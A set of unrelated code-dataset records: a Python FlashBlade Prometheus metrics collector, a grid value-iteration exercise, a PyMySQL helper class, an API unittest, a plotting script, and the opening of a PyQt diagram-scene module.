'total_physical'],\n b.space.total_physical)\n space.add_metric([b.account.name, b.name, 'virtual'], b.space.virtual)\n space.add_metric([b.account.name, b.name, 'unique'], b.space.unique)\n yield datareduction\n yield objcount\n yield space\n\n def filesystems_space(self):\n \"\"\"\n Create metrics of gauge type for filesystems space indicators,\n with filesystem name as label.\n Metrics values can be iterated over.\n \"\"\"\n datareduction = GaugeMetricFamily('purefb_filesystems_data_reduction',\n 'FlashBlade filesystems data reduction',\n labels=['name'])\n space = GaugeMetricFamily('purefb_filesystems_space_bytes',\n 'FlashBlade filesystems space',\n labels=['name', 'dimension'])\n for f in self.filesystems.items:\n if f.space.data_reduction is None:\n f.space.data_reduction = 0\n datareduction.add_metric([f.name], f.space.data_reduction)\n space.add_metric([f.name, 'provisioned'], f.provisioned)\n space.add_metric([f.name, 'snapshots'], f.space.snapshots)\n space.add_metric([f.name, 'total_physical'], f.space.total_physical)\n space.add_metric([f.name, 'virtual'], f.space.virtual)\n space.add_metric([f.name, 'unique'], f.space.unique)\n yield datareduction\n yield space\n\n def array_perf(self):\n \"\"\"\n Create array performance metrics of gauge type.\n Metrics values can be iterated over.\n \"\"\"\n protocols = ['http', 'nfs', 's3', 'smb']\n bpops = GaugeMetricFamily('purefb_array_performance_opns_bytes',\n 'FlashBlade array average bytes per operations',\n labels=['protocol', 'dimension'])\n latency = GaugeMetricFamily('purefb_array_performance_latency_usec',\n 'FlashBlade array latency',\n labels=['protocol', 'dimension'])\n iops = GaugeMetricFamily('purefb_array_performance_iops',\n 'FlashBlade array IOPS',\n labels=['protocol', 
'dimension'])\n throughput = GaugeMetricFamily('purefb_array_performance_throughput_bytes',\n 'FlashBlade array throughput',\n labels=['protocol', 'dimension'])\n\n for proto in protocols:\n fb_perf = self.fb.arrays.list_arrays_performance(protocol=proto).items[0]\n\n bpops.add_metric([proto, 'per_op'], fb_perf.bytes_per_op)\n bpops.add_metric([proto, 'read'], fb_perf.bytes_per_read)\n bpops.add_metric([proto, 'write'], fb_perf.bytes_per_write)\n latency.add_metric([proto, 'read'], fb_perf.usec_per_read_op)\n latency.add_metric([proto, 'write'], fb_perf.usec_per_write_op)\n latency.add_metric([proto, 'other'], fb_perf.usec_per_other_op)\n iops.add_metric([proto, 'read'], fb_perf.reads_per_sec)\n iops.add_metric([proto, 'write'], fb_perf.writes_per_sec)\n iops.add_metric([proto, 'other'], fb_perf.others_per_sec)\n #iops.add_metric([proto, 'in'], fb_perf.input_per_sec)\n #iops.add_metric([proto, 'out'], fb_perf.output_per_sec)\n throughput.add_metric([proto, 'read'], fb_perf.read_bytes_per_sec)\n throughput.add_metric([proto, 'write'], fb_perf.write_bytes_per_sec)\n yield bpops\n yield latency\n yield iops\n yield throughput\n\n def filesystems_perf(self):\n \"\"\"\n Create metrics of gauge type for filesystems performance indicators,\n with filesystem name as label.\n Metrics values can be iterated over.\n \"\"\"\n\n bpops = GaugeMetricFamily('purefb_filesystem_performance_opns_bytes',\n 'FlashBlade filesystem average bytes per operations',\n labels=['protocol', 'name', 'dimension'])\n latency = GaugeMetricFamily('purefb_filesystem_performance_latency_usec',\n 'FlashBlade filesystem latency',\n labels=['protocol', 'name', 'dimension'])\n iops = GaugeMetricFamily('purefb_filesystem_performance_iops',\n 'FlashBlade filesystem IOPS',\n labels=['protocol', 'name', 'dimension'])\n throughput = GaugeMetricFamily('purefb_filesystem_performance_throughput_bytes',\n 'FlashBlade filesystem throughput',\n labels=['protocol', 'name', 'dimension'])\n for f in self.filesystems.items:\n if not f.nfs.enabled:\n continue\n fb_fs_perf = None\n try:\n fb_fs_perf = self.fb.file_systems.list_file_systems_performance(protocol='nfs',names=[f.name]).items[0]\n except Exception as e:\n continue\n bpops.add_metric(['nfs', f.name, 'per_op'], fb_fs_perf.bytes_per_op)\n bpops.add_metric(['nfs', f.name, 'read'], fb_fs_perf.bytes_per_read)\n bpops.add_metric(['nfs', f.name, 'write'], fb_fs_perf.bytes_per_write)\n latency.add_metric(['nfs', f.name, 'read'], fb_fs_perf.usec_per_read_op)\n latency.add_metric(['nfs', f.name, 'write'], fb_fs_perf.usec_per_write_op)\n latency.add_metric(['nfs', f.name, 'other'], fb_fs_perf.usec_per_other_op)\n iops.add_metric(['nfs', f.name, 'read'], fb_fs_perf.reads_per_sec)\n iops.add_metric(['nfs', f.name, 'write'], fb_fs_perf.writes_per_sec)\n iops.add_metric(['nfs', f.name, 'other'], fb_fs_perf.others_per_sec)\n throughput.add_metric(['nfs', f.name, 'read'], fb_fs_perf.read_bytes_per_sec)\n throughput.add_metric(['nfs', f.name, 'write'], fb_fs_perf.write_bytes_per_sec)\n\n yield bpops\n yield latency\n yield iops\n yield throughput\n\n def buckets_perf(self):\n \"\"\"\n Create metrics of gauge type for buckets performance indicators, with the\n account name and the bucket name as labels.\n Metrics values can be iterated over.\n \"\"\"\n latency = GaugeMetricFamily('purefb_bucket_performance_latency_usec',\n 'FlashBlade bucket latency',\n labels=['name', 'dimension'])\n throughput = GaugeMetricFamily('purefb_bucket_performance_throughput_bytes',\n 'FlashBlade bucket throughput',\n 
labels=['name', 'dimension'])\n\n for b in self.buckets.items:\n try:\n bperf = self.fb.buckets.list_buckets_s3_specific_performance(names=[b.name]).items[0]\n except Exception as e:\n continue\n #bperf = self.fb.buckets.list_buckets_performance(names=[b.name])\n latency.add_metric([b.name, 'read_buckets'], bperf.usec_per_read_bucket_op)\n latency.add_metric([b.name, 'read_objects'], bperf.usec_per_read_object_op)\n latency.add_metric([b.name, 'write_buckets'], bperf.usec_per_write_bucket_op)\n latency.add_metric([b.name, 'write_objects'], bperf.usec_per_write_object_op)\n latency.add_metric([b.name, 'other'], bperf.usec_per_other_op)\n throughput.add_metric([b.name, 'read_buckets'], bperf.read_buckets_per_sec)\n throughput.add_metric([b.name, 'read_objects'], bperf.read_objects_per_sec)\n throughput.add_metric([b.name, 'write_buckets'], bperf.write_buckets_per_sec)\n throughput.add_metric([b.name, 'write_objects'], bperf.write_objects_per_sec)\n throughput.add_metric([b.name, 'other'], bperf.others_per_sec)\n\n yield latency\n yield throughput\n\n def clientperf(self):\n \"\"\"\n Create metrics of gauge type for client performance metrics.\n Metrics values can be iterated over.\n \"\"\"\n fb_clientperf = self.fb.arrays.list_clients_performance()\n bpops = GaugeMetricFamily('purefb_client_performance_opns_bytes',\n 'FlashBlade client average bytes per operations',\n labels=['name', 'port', 'dimension'])\n latency = GaugeMetricFamily('purefb_client_performance_latency_usec',\n 'FlashBlade latency',\n labels=['name', 'port', 'dimension'])\n iops = GaugeMetricFamily('purefb_client_performance_iops',\n 'FlashBlade IOPS',\n labels=['name', 'port', 'dimension'])\n throughput = GaugeMetricFamily('purefb_client_performance_throughput_bytes',\n 'FlashBlade client_throughput',\n labels=['name', 'port', 'dimension'])\n\n for cperf in fb_clientperf.items:\n client, port = cperf.name.split(':')\n bpops.add_metric([client, port, 'per_op'], cperf.bytes_per_op)\n bpops.add_metric([client, port, 'read'], cperf.bytes_per_read)\n bpops.add_metric([client, port, 'write'], cperf.bytes_per_write)\n iops.add_metric([client, port, 'read'], cperf.reads_per_sec)\n iops.add_metric([client, port, 'write'], cperf.writes_per_sec)\n iops.add_metric([client, port, 'other'], cperf.others_per_sec)\n latency.add_metric([client, port, 'read'], cperf.usec_per_read_op)\n latency.add_metric([client, port, 'write'], cperf.usec_per_write_op)\n latency.add_metric([client, port, 'other'], cperf.usec_per_other_op)\n throughput.add_metric([client, port, 'read'], cperf.read_bytes_per_sec)\n throughput.add_metric([client, port, 'write'], cperf.write_bytes_per_sec)\n\n yield bpops\n yield latency\n yield iops\n yield throughput\n\n def collect(self):\n \"\"\"Global collector method for all the collected array metrics.\"\"\"\n if (self.request == 'all' or self.request == 'array'):\n yield from self.array_info()\n yield from self.array_hw()\n yield from self.array_events()\n yield from self.array_perf()\n yield from self.array_space()\n yield from self.filesystems_space()\n yield from self.buckets_space()\n yield from self.filesystems_perf()\n yield from self.buckets_perf()\n if (self.request == 'all' or self.request == 'clients'):\n yield from self.clientperf()\n","sub_path":"collectors/flashblade.py","file_name":"flashblade.py","file_ext":"py","file_size_in_byte":16859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"374460756","text":"# ----------\n# User Instructions:\n# \n# 
Create a function compute_value which returns\n# a grid of values. The value of a cell is the minimum\n# number of moves required to get from the cell to the goal. \n#\n# If a cell is a wall or it is impossible to reach the goal from a cell,\n# assign that cell a value of 99.\n# ----------\n\ngrid = [[0, 1, 0, 0, 0, 0],\n [0, 1, 0, 0, 0, 0],\n [0, 1, 0, 0, 0, 0],\n [0, 1, 0, 0, 0, 0],\n [0, 0, 0, 0, 1, 0]]\n\ngoal = [len(grid)-1, len(grid[0])-1]\ncost = 1 # the cost associated with moving from a cell to an adjacent one\n\ndelta = [[-1, 0 ], # go up\n [ 0, -1], # go left\n [ 1, 0 ], # go down\n [ 0, 1 ]] # go right\n\ndelta_name = ['^', '<', 'v', '>']\n\ndef get_minimum_cost(dynamic_grid, x, y):\n value = 999999\n for i in range(len(delta)):\n new_x = x + delta[i][1]\n new_y = y + delta[i][0]\n\n if new_x < 0 or new_x >= len(dynamic_grid[0]) or new_y < 0 or new_y >= len(dynamic_grid):\n continue\n\n if dynamic_grid[new_y][new_x] < value:\n value = dynamic_grid[new_y][new_x]\n\n return value\n\ndef get_optimal_turn(dynamic_grid, x, y):\n if dynamic_grid[y][x] == 99:\n return ' '\n\n value = 99999\n turn = ' '\n\n for i in range(len(delta)):\n new_x = x + delta[i][1]\n new_y = y + delta[i][0]\n\n if new_x < 0 or new_x >= len(dynamic_grid[0]) or new_y < 0 or new_y >= len(dynamic_grid):\n continue\n\n if dynamic_grid[new_y][new_x] < value:\n value = dynamic_grid[new_y][new_x]\n turn = delta_name[i]\n\n return turn\n\ndef compute_cell_values(grid, dynamic_grid, cost, x, y):\n for i in range(len(delta)):\n new_x = x + delta[i][1]\n new_y = y + delta[i][0]\n\n if new_x < 0 or new_x >= len(grid[0]) or new_y < 0 or new_y >= len(grid):\n continue\n\n if grid[new_y][new_x] == 1:\n new_cost = 99\n else:\n new_cost = min(get_minimum_cost(dynamic_grid, new_x, new_y) + 1, 99)\n\n # if the cost doesn't change, no need to recount the neighbours\n if new_cost >= dynamic_grid[new_y][new_x]:\n continue\n else:\n dynamic_grid[new_y][new_x] = new_cost\n\n compute_cell_values(grid, dynamic_grid, cost, new_x, new_y)\n\ndef compute_value(grid, goal, cost):\n dynamic_grid = [[99 for row in range(len(grid[0]))] for col in range(len(grid))]\n\n dynamic_grid[goal[0]][goal[1]] = 0\n compute_cell_values(grid, dynamic_grid, cost, goal[1], goal[0]) \n return dynamic_grid\n\ndef optimum_policy(grid, goal, cost):\n optimal_turns = [[' ' for row in range(len(grid[0]))] for col in range(len(grid))]\n\n dynamic_grid = compute_value(grid, goal, cost)\n\n for y in range(len(dynamic_grid)):\n for x in range(len(dynamic_grid[y])):\n if goal[0] == y and goal[1] == x:\n optimal_turns[y][x] = \"*\"\n else:\n optimal_turns[y][x] = get_optimal_turn(dynamic_grid, x, y)\n\n return optimal_turns \n\nval = optimum_policy(grid, goal, cost)\nfor i in range(len(val)):\n print(val[i])\n","sub_path":"lesson4/dynamic_programming_2.py","file_name":"dynamic_programming_2.py","file_ext":"py","file_size_in_byte":3119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"91818240","text":"import pymysql\r\n\r\nclass mysqlhelper:\r\n\r\n def getCon(self):\r\n try:\r\n conn = pymysql.connect(host='localhost', user='root', passwd='mysql', db='test', port=3306, charset='utf8')\r\n #print(\"Database connection succeeded\")\r\n return conn\r\n except pymysql.Error as e:\r\n print(\"Database connection failed, %s\"% e)\r\n\r\n def select(self,sql):\r\n try:\r\n con=self.getCon()\r\n #print(con)\r\n #cur = con.cursor(pymysql.cursors.DictCursor)\r\n cur=con.cursor()\r\n cur.execute(sql)\r\n fc=cur.fetchall()\r\n return fc\r\n except pymysql.Error as 
e:\r\n print(\"Query failed, please check the database! %s\"% e)\r\n finally:\r\n cur.close()\r\n con.close()\r\n\r\n def select_psword(self, sql,param):\r\n try:\r\n con = self.getCon()\r\n # print(con)\r\n #cur = con.cursor(pymysql.cursors.DictCursor)\r\n cur = con.cursor()\r\n cur.execute(sql,param)\r\n fc = cur.fetchone()\r\n return fc\r\n except pymysql.Error as e:\r\n print(\"Query failed, please check the database! %s\" % e)\r\n finally:\r\n cur.close()\r\n con.close()\r\n def update(self, sql, params):\r\n try:\r\n con = self.getCon()\r\n print(con)\r\n cur = con.cursor()\r\n count = cur.execute(sql, params)\r\n con.commit()\r\n #print(\"Update succeeded\")\r\n return count\r\n except pymysql.Error as e:\r\n print(\"Update failed, please check the database! %s\"% e)\r\n\r\n finally:\r\n cur.close()\r\n con.close()\r\n\r\n\r\n\r\n","sub_path":"DBHelper/MysqldbHelper.py","file_name":"MysqldbHelper.py","file_ext":"py","file_size_in_byte":1714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"223406646","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport random\nfrom matplotlib.font_manager import FontProperties\nimport sys\n\n\nimport readcsv\nimport plot_utils\n\n\n\nif len(sys.argv) > 1:\n filename = sys.argv[1]\n\ncsv = readcsv.parse_to_dir_list(filename)\n\n# all columns in trainAndTest are:\n# test FPR,threads_per_datapoint,runs,train Error,name,train TPR,train FPR,\n# test TPR,epochs,step_size,test Error,datapoints_per_block,tolerance,train time\n\n\n# this will represent the different\n# cols_to_merge_with_name = [\"threads_per_datapoint\", \"datapoints_per_block\"]\ncols_to_merge_with_name = [\"datapoints_per_block\"]\n\ncol_x_axis = \"threads_per_datapoint\"\ncols_y_axis = [\"train time\"]\n\n\nfor col_y_axis in cols_y_axis:\n lines = {}\n # print(col_y_axis)\n for idx, _ in enumerate(csv[\"name\"]):\n line_name = plot_utils.get_line_name(idx, csv, cols_to_merge_with_name)\n\n if line_name not in lines:\n lines[line_name] = {'x':[], 'y':[]}\n\n lines[line_name]['x'].append(csv[col_x_axis][idx])\n lines[line_name]['y'].append(csv[col_y_axis][idx])\n\n plot_utils.adapt_baselines(lines)\n\n ax = plt.subplot(1, 1, 1)\n\n plot_utils.plot(lines, col_x_axis, col_y_axis, ax)\n\nplt.show(block=False)\n\nraw_input(\"press enter to close\")\n\nplt.close(\"all\")\n","sub_path":"scripts/plot_time.py","file_name":"plot_time.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"243628963","text":"import requests\nimport json\nimport unittest\nfrom test_case import public1\nlist=[]\nclass Material(unittest.TestCase):\n def test_Material_Collection(self):\n headers={\"Authorization\":public1.token_syjc(),\n \"Content-Type\":\"application/json\"}\n url=\"http://10.1.0.213:30114/user/permission-collect-materials\"\n payload={\n \"materialsUuid\":\"TI_SN74LVTH541NS\",\n \"platformType\":\n {\n \"value\":\"1\"\n }\n }\n data_json=json.dumps(payload)\n response=requests.post(url=url,data=data_json,headers=headers)\n # response = requests.post(url=url, json=payload, headers=headers)\n print(response.json())\n list.append(response.json())\n print(list)\n print(list[0][\"msg\"])\n self.assertEqual(list[0][\"msg\"],\"SUCCESS\")\n\n# # build the test suite\n# def suite():\n# suite=unittest.TestSuite()\n# suite.addTest(Material(\"test_Material_Collection\"))\n# return suite\n\n# run the tests\nif __name__ == \"__main__\":\n 
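# executing this module directly runs the test case above\n    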
unittest.main()\n\n\n\n","sub_path":"test_case/test_Material_Collection2.py","file_name":"test_Material_Collection2.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"188513599","text":"#!/usr/bin/env python\n\n# This is only needed for Python v2 but is harmless for Python v3.\n#\n# 2010 - Mitja: apparently this is only necessary if run as main class:\nif __name__ == '__main__':\n import sip\n sip.setapi('QString', 2)\n\n\n# 2010 - Mitja:\nimport inspect # for debugging functions, remove in final version\n# debugging functions, remove in final version\ndef debugWhoIsTheRunningFunction():\n return inspect.stack()[1][3]\ndef debugWhoIsTheParentFunction():\n return inspect.stack()[2][3]\n\n\n\n# 2012 - Mitja: advanced debugging tools,\n# work only on Posix-compliant systems so far (no MS-Windows)\n# commented out for now:\n#\n# def dumpstacks(signal, frame):\n# id2name = dict([(th.ident, th.name) for th in threading.enumerate()])\n# code = []\n# for threadId, stack in sys._current_frames().items():\n# code.append(\"\\n# Thread: %s(%d)\" % (id2name.get(threadId,\"\"), threadId))\n# for filename, lineno, name, line in traceback.extract_stack(stack):\n# code.append('File: \"%s\", line %d, in %s' % (filename, lineno, name))\n# if line:\n# code.append(\" %s\" % (line.strip()))\n# CDConstants.printOut(str(\"\\n\".join(code)) , CDConstants.DebugTODO )\n\n\n# 2012 - Mitja: advanced debugging tools,\n# work only on Posix-compliant systems so far (no MS-Windows)\n# commented out for now:\n#\n# import signal\n# \n# signal.signal(signal.SIGQUIT, dumpstacks)\n\n\n\n\n\n\n\n\n\nimport sys # sys is necessary to inquire about \"sys.platform\" and \"sys.version_info\"\n\nimport math\n\n# 2010 - Mitja: for cut/copy/paste operations on scene items,\n# we would need deepcopy, if it worked with Qt objects, but it doesn't.\n# import copy\n\nfrom PyQt4 import QtCore, QtGui\n\n# --> --> --> mswat code added to run in MS Windows --> --> -->\n# --> --> --> mswat code added to run in MS Windows --> --> -->\nimport PyQt4.QtCore\nimport PyQt4.QtGui\nimport PyQt4\n# <-- <-- <-- mswat code added to run in MS Windows <-- <-- <--\n# <-- <-- <-- mswat code added to run in MS Windows <-- <-- <--\n\n# 2011 - Mitja: external class defining all global constants for CellDraw:\nfrom cdConstants import CDConstants\n\n# 2011 - Mitja: external class for drawing an image layer on a QGraphicsScene:\nfrom cdImageLayer import CDImageLayer\n\n# 2011 - Mitja: external class for handling a sequence of images:\nfrom cdImageSequence import CDImageSequence\n\n# 2011 - Mitja: external class for buttons, labels, etc:\nfrom cdControlPanel import CDControlPanel\n\n# 2011 - Mitja: external class for controlling image picking mode: buttons/sliders:\nfrom cdControlInputImage import CDControlInputImage\n\n# 2011 - Mitja: external class for accessing image sequence controls:\nfrom cdControlImageSequence import CDControlImageSequence\n\n# 2011 - Mitja: external class for accessing clusters controls:\nfrom cdControlClusters import CDControlClusters\n\n# 2011 - Mitja: external class for controlling drawing toggle: regions vs. 
cells:\nfrom cdControlRegionOrCell import CDControlRegionOrCell\n\n# 2011 - Mitja: external class for selecting layer mode:\nfrom cdControlLayerSelection import CDControlLayerSelection\n\n# 2011 - Mitja: external class for scene scale / zoom control:\nfrom cdControlSceneScaleZoom import CDControlSceneScaleZoom\n\n# 2011 - Mitja: external class for scene item edit controls:\nfrom cdControlSceneItemEdit import PIFControlSceneItemEdit\n\n# 2011 - Mitja: external class for setting types of regions and cells:\nfrom cdControlTypes import CDControlTypes\n\n# 2011 - Mitja: # CDSceneAssistant - starting assistant/wizard for CellDraw\nfrom cdSceneAssistant import CDSceneAssistant\n\n\n\n# the following import is about a resource file generated thus:\n# \"pyrcc4 cdDiagramScene.qrc -o cdDiagramScene_rc.py\"\n# which requires the file cdDiagramScene.qrc to correctly point to the files in \":/images\"\n# only that way will the icons etc. be available after the import:\nimport cdDiagramScene_rc\n\n\n# ------------------------------------------------------------\n# ------------------------------------------------------------\nclass Arrow(QtGui.QGraphicsLineItem):\n def __init__(self, startItem, endItem, parent=None, scene=None):\n super(Arrow, self).__init__(parent, scene)\n\n self.arrowHead = QtGui.QPolygonF()\n\n self.myStartItem = startItem\n self.myEndItem = endItem\n self.setFlag(QtGui.QGraphicsItem.ItemIsSelectable, True)\n self.myColor = QtCore.Qt.black\n self.setPen(QtGui.QPen(self.myColor, 2.0, QtCore.Qt.SolidLine,\n QtCore.Qt.RoundCap, QtCore.Qt.RoundJoin))\n\n def setColor(self, color):\n self.myColor = color\n\n def startItem(self):\n return self.myStartItem\n\n def endItem(self):\n return self.myEndItem\n\n def boundingRect(self):\n extra = (self.pen().width() + 20) / 2.0\n p1 = self.line().p1()\n p2 = self.line().p2()\n return QtCore.QRectF(p1, QtCore.QSizeF(p2.x() - p1.x(), p2.y() - p1.y())).normalized().adjusted(-extra, -extra, extra, extra)\n\n def shape(self):\n path = super(Arrow, self).shape()\n path.addPolygon(self.arrowHead)\n return path\n\n def updatePosition(self):\n line = QtCore.QLineF(self.mapFromItem(self.myStartItem, 0, 0), self.mapFromItem(self.myEndItem, 0, 0))\n self.setLine(line)\n\n def paint(self, painter, option, widget=None):\n if (self.myStartItem.collidesWithItem(self.myEndItem)):\n return\n\n myStartItem = self.myStartItem\n myEndItem = self.myEndItem\n myColor = self.myColor\n myPen = self.pen()\n myPen.setColor(self.myColor)\n arrowSize = 20.0\n painter.setPen(myPen)\n painter.setBrush(self.myColor)\n\n centerLine = QtCore.QLineF(myStartItem.pos(), myEndItem.pos())\n endPolygon = myEndItem.polygon()\n p1 = endPolygon.first() + myEndItem.pos()\n\n intersectPoint = QtCore.QPointF()\n for i in endPolygon:\n p2 = i + myEndItem.pos()\n polyLine = QtCore.QLineF(p1, p2)\n intersectType = polyLine.intersect(centerLine, intersectPoint)\n if intersectType == QtCore.QLineF.BoundedIntersection:\n break\n p1 = p2\n\n self.setLine(QtCore.QLineF(intersectPoint, myStartItem.pos()))\n line = self.line()\n\n angle = math.acos(line.dx() / line.length())\n if line.dy() >= 0:\n angle = (math.pi * 2.0) - angle\n\n arrowP1 = line.p1() + QtCore.QPointF(math.sin(angle + math.pi / 3.0) * arrowSize,\n math.cos(angle + math.pi / 3) * arrowSize)\n arrowP2 = line.p1() + QtCore.QPointF(math.sin(angle + math.pi - math.pi / 3.0) * arrowSize,\n math.cos(angle + math.pi - math.pi / 3.0) * arrowSize)\n\n self.arrowHead.clear()\n for point in [line.p1(), arrowP1, arrowP2]:\n 
self.arrowHead.append(point)\n\n painter.drawLine(line)\n painter.drawPolygon(self.arrowHead)\n if self.isSelected():\n painter.setPen(QtGui.QPen(myColor, 1.0, QtCore.Qt.DashLine))\n myLine = QtCore.QLineF(line)\n myLine.translate(0, 4.0)\n painter.drawLine(myLine)\n myLine.translate(0,-8.0)\n painter.drawLine(myLine)\n\n\n# ------------------------------------------------------------\n# ------------------------------------------------------------\nclass DiagramTextItem(QtGui.QGraphicsTextItem):\n signalLostFocus = QtCore.pyqtSignal(QtGui.QGraphicsTextItem)\n signalSelectedChange = QtCore.pyqtSignal(QtGui.QGraphicsItem)\n\n def __init__(self, parent=None, scene=None):\n super(DiagramTextItem, self).__init__(parent, scene)\n\n self.setFlag(QtGui.QGraphicsItem.ItemIsMovable)\n self.setFlag(QtGui.QGraphicsItem.ItemIsSelectable)\n\n def itemChange(self, change, value):\n if change == QtGui.QGraphicsItem.ItemSelectedChange:\n self.signalSelectedChange.emit(self)\n return value\n\n def focusOutEvent(self, event):\n self.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)\n self.signalLostFocus.emit(self)\n super(DiagramTextItem, self).focusOutEvent(event)\n\n def mouseDoubleClickEvent(self, event):\n if self.textInteractionFlags() == QtCore.Qt.NoTextInteraction:\n self.setTextInteractionFlags(QtCore.Qt.TextEditorInteraction)\n super(DiagramTextItem, self).mouseDoubleClickEvent(event)\n\n\n# ------------------------------------------------------------\n# 2010 - Mitja: this is the main item class for the diagram scene:\n# ------------------------------------------------------------\n# (the QGraphicsPolygonItem class is a child of QGraphicsItem)\nclass DiagramItem(QtGui.QGraphicsPolygonItem):\n # 2010 - Mitja: these are possible types for the diagram type:\n # originally 4 types: RectangleConst, TenByTenBoxConst, StartEndConst, TwoByTwoBoxConst = range(4)\n RectangleConst, TenByTenBoxConst, StartEndConst, TwoByTwoBoxConst, PathConst = range(5)\n\n def __init__(self, pDiagramType, contextMenu, parent=None, scene=None):\n super(DiagramItem, self).__init__(parent, scene)\n\n CDConstants.printOut(\"DiagramItem DIAGRAMITEM debugWhoIsTheRunningFunction() is \"+str(debugWhoIsTheRunningFunction())+\" debugWhoIsTheParentFunction() is \"+str(debugWhoIsTheParentFunction()), CDConstants.DebugTODO )\n\n if (CDConstants.globalDebugLevel >= CDConstants.DebugAll):\n import traceback\n traceback.print_stack()\n\n # self.setFillRule(QtCore.Qt.WindingFill) from Qt documentation:\n # Specifies that the region is filled using the non zero winding rule.\n # With this rule, we determine whether a point is inside the shape by\n # using the following method. Draw a horizontal line from the point to a\n # location outside the shape. Determine whether the direction of the line\n # at each intersection point is up or down. The winding number is\n # determined by summing the direction of each intersection. If the number\n # is non zero, the point is inside the shape. 
This fill mode can also in\n # most cases be considered as the intersection of closed shapes.\n\n self.setFillRule(QtCore.Qt.WindingFill)\n\n self.arrows = []\n # store each item's scaling factors separately for X and Y\n self.myScaleX = 1.0\n self.myScaleY = 1.0\n # 2011 - Mitja: store a backup copy of the item's pen and brush:\n self.bakPen = QtGui.QPen()\n self.bakBrush = QtGui.QBrush()\n # 2011 - Mitja: add a unique counter to identify each DiagramItem in the scene:\n self.regionID = 0\n\n # is this item a region of cells or a single cell?\n self.itsaRegionOrCell = CDConstants.ItsaRegionConst\n self.setRegionOrCell(self.itsaRegionOrCell)\n\n # 2010 - Mitja: add code for handling insertion of Path items:\n # CDConstants.printOut( \" \"+str( \"type(pDiagramType).__name__ = \", type(pDiagramType).__name__ )+\" \", CDConstants.DebugTODO )\n if (type(pDiagramType).__name__ == \"int\") :\n # we are instantiating a normal type of diagram item:\n self.diagramType = pDiagramType\n\n else:\n# else (type(pDiagramType).__name__ is \"QPainterPath\"):\n CDConstants.printOut(\"DEBUG DEBUG ----- DiagramItem(): type(pDiagramType).__name__ = \"+str(type(pDiagramType).__name__), CDConstants.DebugTODO )\n # since we received a QPainterPath parameter \n # we are instantiating a Path type of diagram item:\n self.diagramType = DiagramItem.PathConst\n self.thePathToBuildAPolygon = pDiagramType\n\n self.contextMenu = contextMenu\n\n lThisIsAnUnusedStartEndPath = QtGui.QPainterPath()\n if self.diagramType == self.StartEndConst:\n lThisIsAnUnusedStartEndPath.moveTo(200, 50)\n lThisIsAnUnusedStartEndPath.arcTo(150, 0, 50, 50, 0, 90)\n lThisIsAnUnusedStartEndPath.arcTo(50, 0, 50, 50, 90, 90)\n lThisIsAnUnusedStartEndPath.arcTo(50, 50, 50, 50, 180, 90)\n lThisIsAnUnusedStartEndPath.arcTo(150, 50, 50, 50, 270, 90)\n lThisIsAnUnusedStartEndPath.lineTo(200, 25)\n self.myPolygon = lThisIsAnUnusedStartEndPath.toFillPolygon()\n elif self.diagramType == self.TenByTenBoxConst:\n self.myPolygon = QtGui.QPolygonF([\n QtCore.QPointF(-5, -5), QtCore.QPointF(-5, 5),\n QtCore.QPointF(5, 5), QtCore.QPointF(5, -5),\n QtCore.QPointF(-5, -5)])\n# QtCore.QPointF(-100, 0), QtCore.QPointF(0, 100),\n# QtCore.QPointF(100, 0), QtCore.QPointF(0, -100),\n# QtCore.QPointF(-100, 0)])\n elif self.diagramType == self.RectangleConst:\n self.myPolygon = QtGui.QPolygonF([\n QtCore.QPointF(-50, -50), QtCore.QPointF(50, -50),\n QtCore.QPointF(50, 50), QtCore.QPointF(-50, 50),\n QtCore.QPointF(-50, -50)])\n# QtCore.QPointF(-100, -100), QtCore.QPointF(100, -100),\n# QtCore.QPointF(100, 100), QtCore.QPointF(-100, 100),\n# QtCore.QPointF(-100, -100)])\n elif self.diagramType == self.TwoByTwoBoxConst:\n self.myPolygon = QtGui.QPolygonF([\n QtCore.QPointF(-1, -1), QtCore.QPointF(-1, 1),\n QtCore.QPointF(1, 1), QtCore.QPointF(1, -1),\n QtCore.QPointF(-1, -1)])\n# self.myPolygon = QtGui.QPolygonF([\n# QtCore.QPointF(-120, -80), QtCore.QPointF(-70, 80),\n# QtCore.QPointF(120, 80), QtCore.QPointF(70, -80),\n# QtCore.QPointF(-120, -80)])\n elif self.diagramType == self.PathConst:\n # CDConstants.printOut( \" \"+str( \"self.thePathToBuildAPolygon =\", self.thePathToBuildAPolygon )+\" \", CDConstants.DebugTODO )\n # convert from painter path to polygon:\n self.thePathToBuildAPolygon = self.thePathToBuildAPolygon.simplified()\n\n self.myPolygon = self.thePathToBuildAPolygon.toFillPolygon()\n\n # 2010 - Mitja: create a Path item here:\n # self.setPath(self.thePathToBuildAPolygon)\n\n # build a temporary QGraphicsPolygonItem and assign the constructed polygon to 
it:\n# lTempGraphicsItem = QtGui.QGraphicsPolygonItem()\n# lTempGraphicsItem.setPolygon(self.myPolygon)\n # self.setPolygon(self.myPolygon)\n\n# CDConstants.printOut( \" \"+str( \"tmp polyg (diagramType=\", self.diagramType,\").boundingRect =\",lTempGraphicsItem.polygon().boundingRect() )+\" \", CDConstants.DebugTODO )\n# CDConstants.printOut( \" \"+str( \" hello, I'm %s, parent is %s\" % (debugWhoIsTheRunningFunction(), debugWhoIsTheParentFunction()) )+\" \", CDConstants.DebugTODO )\n# CDConstants.printOut( \" \"+str( \" boundingRegionGranularity =\", lTempGraphicsItem.boundingRegionGranularity() )+\" \", CDConstants.DebugTODO )\n# lTempGraphicsItem.setBoundingRegionGranularity(1.0)\n# CDConstants.printOut( \" \"+str( \" boundingRegionGranularity =\", lTempGraphicsItem.boundingRegionGranularity() )+\" \", CDConstants.DebugTODO )\n# \n# # obtain the QGraphicsPolygonItem's bounding QRegion in local coordinates, passing an identity QTransform:\n# lBoundingRegion = lTempGraphicsItem.boundingRegion(QtGui.QTransform())\n# CDConstants.printOut( \" \"+str( \" boundingRegion =\", lBoundingRegion )+\" \", CDConstants.DebugTODO )\n# CDConstants.printOut( \" \"+str( \" boundingRegion.boundingRect() =\", 